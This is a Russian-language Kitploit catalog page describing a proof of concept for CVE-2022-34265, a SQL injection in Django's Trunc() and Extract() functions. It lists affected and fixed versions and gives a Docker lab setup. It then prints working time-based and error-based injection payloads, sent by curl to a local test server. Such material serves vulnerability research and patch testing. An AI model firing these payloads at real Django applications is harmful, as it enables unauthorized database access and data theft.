Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2022-34265 — PoC for CVE-2022-34265 | Kitploit
Инструменты/GitHubGitHub/zhaoqi99/cve-2022-34265
Vulnerability AnalysisCode AnalysisExploitationWeb Application ExploitationPenetration TestingDatabase Security
GitHubzhaoqi99/cve-2022-34265

CVE-2022-34265

PoC for CVE-2022-34265

Репозиторий
43 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2022-34265

PoC для CVE-2022-34265


Описание

Проблема была обнаружена в Django 3.2 до 3.2.14 и 4.0 до 4.0.6. Функции базы данных Trunc() и Extract() подвержены SQL-инъекции, если ненадежные данные используются в качестве значения kind/lookup_name. Приложения, которые ограничивают выбор lookup_name и kind известным безопасным списком, не затронуты.

Как использовать

Запуск

root@kitploit:~
git clone https://github.com/ZhaoQi99/CVE-2022-34265.git
cd CVE-2022-34265
docker-compose up -d

Удаление

root@kitploit:~
docker-compose down

Затрагиваемые версии

  • Django>= 3.2, < 3.2.14

  • Django >= 4.0, < 4.0.6

Исправленные версии

  • Django 3.2.14

  • Django 4.0.6

Проверка

Окружение

  • Django 4.0.5
  • Python 3.8.13
  • MySQL 5.7

Полезная нагрузка

  • YEAR FROM start_time)) ;select sleep(5)--

  • YEAR FROM start_time)) and updatexml(1,concat(1,(select name from TEST limit 1),1),1)--

PoC

root@kitploit:~
curl "http://127.0.0.1:8000/extract/?lookup_name=YEAR%20FROM%20start_time))%20%3Bselect%20sleep(5)--"
curl "http://127.0.0.1:8000/extract/?lookup_name=YEAR%20FROM%20start_time))%20and%20updatexml(1%2Cconcat(1%2C(select%20name%20from%20TEST%20limit%201)%2C1)%2C1)--"

PS: В случае разных баз данных наличие уязвимости различается. Уязвимость отсутствует в бэкенде базы данных MYSQL для функции Trunc.

Ссылки

  • Репортер: TAKUTO YOSHIKAI (используя PostgreSQL)

  • django/django@877c800

  • django/django@5e2f4dd

  • https://github.com/advisories/GHSA-p64x-8rxx-wf6q

  • CVE-2022-34265 Django SQL 注入漏洞调试分析 - 先知社区

Скачать инструмент